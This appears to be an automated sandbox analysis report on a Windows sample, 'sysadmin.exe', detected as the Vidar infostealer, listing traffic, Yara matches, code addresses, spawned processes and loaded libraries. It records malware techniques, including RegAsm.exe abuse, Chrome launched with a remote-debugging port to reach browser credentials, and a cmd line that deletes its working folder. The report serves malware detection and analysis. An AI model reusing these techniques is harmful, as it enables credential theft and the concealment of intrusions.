            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 116.203.166.124:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040B846 CreateDesktopA,4_2_0040B846

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
            Source: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
            Source: C:\Users\user\Desktop\sysadmin.exeCode function: 0_2_00007FFD9B7E11050_2_00007FFD9B7E1105
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041A0514_2_0041A051
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004240714_2_00424071
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041E0E14_2_0041E0E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004320814_2_00432081
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042F0B14_2_0042F0B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004191614_2_00419161
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042F1714_2_0042F171
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041A1114_2_0041A111
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041B1114_2_0041B111
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004311114_2_00431111
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004241C14_2_004241C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004301D14_2_004301D1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041E1F14_2_0041E1F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004211914_2_00421191
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041A1B14_2_0041A1B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041A2514_2_0041A251
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004302614_2_00430261
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004192014_2_00419201
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042F2114_2_0042F211
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004242814_2_00424281
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041B2A14_2_0041B2A1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041E2B14_2_0041E2B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004243414_2_00424341
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042F3014_2_0042F301
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004193314_2_00419331
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004043E14_2_004043E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004243E14_2_004243E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004303F14_2_004303F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042F3F14_2_0042F3F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004313814_2_00431381
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041A4414_2_0041A441
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004324114_2_00432411
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004194F14_2_004194F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042F4914_2_0042F491
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004315014_2_00431501
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041B5214_2_0041B521
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042F5214_2_0042F521
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004305314_2_00430531
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042F5C14_2_0042F5C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004305D14_2_004305D1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041B5F14_2_0041B5F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004195B14_2_004195B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004036414_2_00403641
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041A6314_2_0041A631
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004316314_2_00431631
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004206D14_2_004206D1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004186F14_2_004186F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042E6814_2_0042E681
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041A7414_2_0041A741
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042E7414_2_0042E741
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004237714_2_00423771
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042E7F14_2_0042E7F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004207B14_2_004207B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042F7B14_2_0042F7B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042F8514_2_0042F851
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004198614_2_00419861
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004188114_2_00418811
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041A8114_2_0041A811
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004038114_2_00403811
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004308314_2_00430831
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004238314_2_00423831
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004188E14_2_004188E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004238F14_2_004238F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042F8F14_2_0042F8F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042E8914_2_0042E891
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004208A14_2_004208A1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041B8B14_2_0041B8B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004209414_2_00420941
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042E9514_2_0042E951
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041A9014_2_0041A901
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004039014_2_00403901
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004199F14_2_004199F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004239F14_2_004239F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042F9814_2_0042F981
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041AA014_2_0041AA01
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00430A114_2_00430A11
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00423AC14_2_00423AC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041AAD14_2_0041AAD1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00419A814_2_00419A81
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00420AA14_2_00420AA1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00403AB14_2_00403AB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041AB714_2_0041AB71
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00430B314_2_00430B31
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00403BC14_2_00403BC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00423B914_2_00423B91
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041BBA14_2_0041BBA1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042DC414_2_0042DC41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00418C714_2_00418C71
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00419C014_2_00419C01
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00430C014_2_00430C01
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042ECC14_2_0042ECC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00430CD14_2_00430CD1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00423CE14_2_00423CE1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041BCB14_2_0041BCB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042FCB14_2_0042FCB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041BD714_2_0041BD71
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042DD014_2_0042DD01
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00419D114_2_00419D11
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042FDD14_2_0042FDD1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042DDE14_2_0042DDE1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00423DF14_2_00423DF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041AD914_2_0041AD91
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00430E214_2_00430E21
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041AE314_2_0041AE31
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00418EF14_2_00418EF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00420E914_2_00420E91
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00436EA24_2_00436EA2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042FEA14_2_0042FEA1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00419EB14_2_00419EB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041AF614_2_0041AF61
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00430F614_2_00430F61
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00420F614_2_00420F61
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00419F714_2_00419F71
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00423F014_2_00423F01
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042DF314_2_0042DF31
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00430FF14_2_00430FF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042DFF14_2_0042DFF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042EFA14_2_0042EFA1
            Source: sysadmin.exe, 00000000.00000002.1727658279.000001A6BFC50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRunFileMemory.dll< vs sysadmin.exe
            Source: sysadmin.exe, 00000000.00000002.1727636446.000001A6BFC40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamejhtixtpk.dll4 vs sysadmin.exe
            Source: sysadmin.exe, 00000000.00000000.1679437052.000001A6BDF62000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHeliosDisplayManagement.exeT vs sysadmin.exe
            Source: sysadmin.exe, 00000000.00000002.1727704147.000001A6BFDE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamejhtixtpk.dll4 vs sysadmin.exe
            Source: sysadmin.exe, 00000000.00000002.1727704147.000001A6BFDE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRunFileMemory.dll< vs sysadmin.exe
            Source: sysadmin.exeBinary or memory string: OriginalFilenameHeliosDisplayManagement.exeT vs sysadmin.exe
            Source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
            Source: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@29/44@8/8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004201FF CreateToolhelp32Snapshot,Process32First,4_2_004201FF
            Source: C:\Users\user\Desktop\sysadmin.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sysadmin.exe.logJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2844:120:WilError_03
            Source: C:\Users\user\Desktop\sysadmin.exeFile created: C:\Users\user\AppData\Local\Temp\jhtixtpkJump to behavior
            Source: sysadmin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: sysadmin.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: u37g4w4ek.4.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: unknownProcess created: C:\Users\user\Desktop\sysadmin.exe "C:\Users\user\Desktop\sysadmin.exe"
            Source: C:\Users\user\Desktop\sysadmin.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8D13.tmp" "c:\Users\user\AppData\Local\Temp\jhtixtpk\CSCCDB7263B207A4F1CADFD2FC19D91DBC.TMP"
            Source: C:\Users\user\Desktop\sysadmin.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2280,i,2341868853609439944,236191859647242175,262144 /prefetch:8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\3wtj5" & exit
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
            Source: C:\Users\user\Desktop\sysadmin.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.cmdline"Jump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8D13.tmp" "c:\Users\user\AppData\Local\Temp\jhtixtpk\CSCCDB7263B207A4F1CADFD2FC19D91DBC.TMP"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\3wtj5" & exitJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2280,i,2341868853609439944,236191859647242175,262144 /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
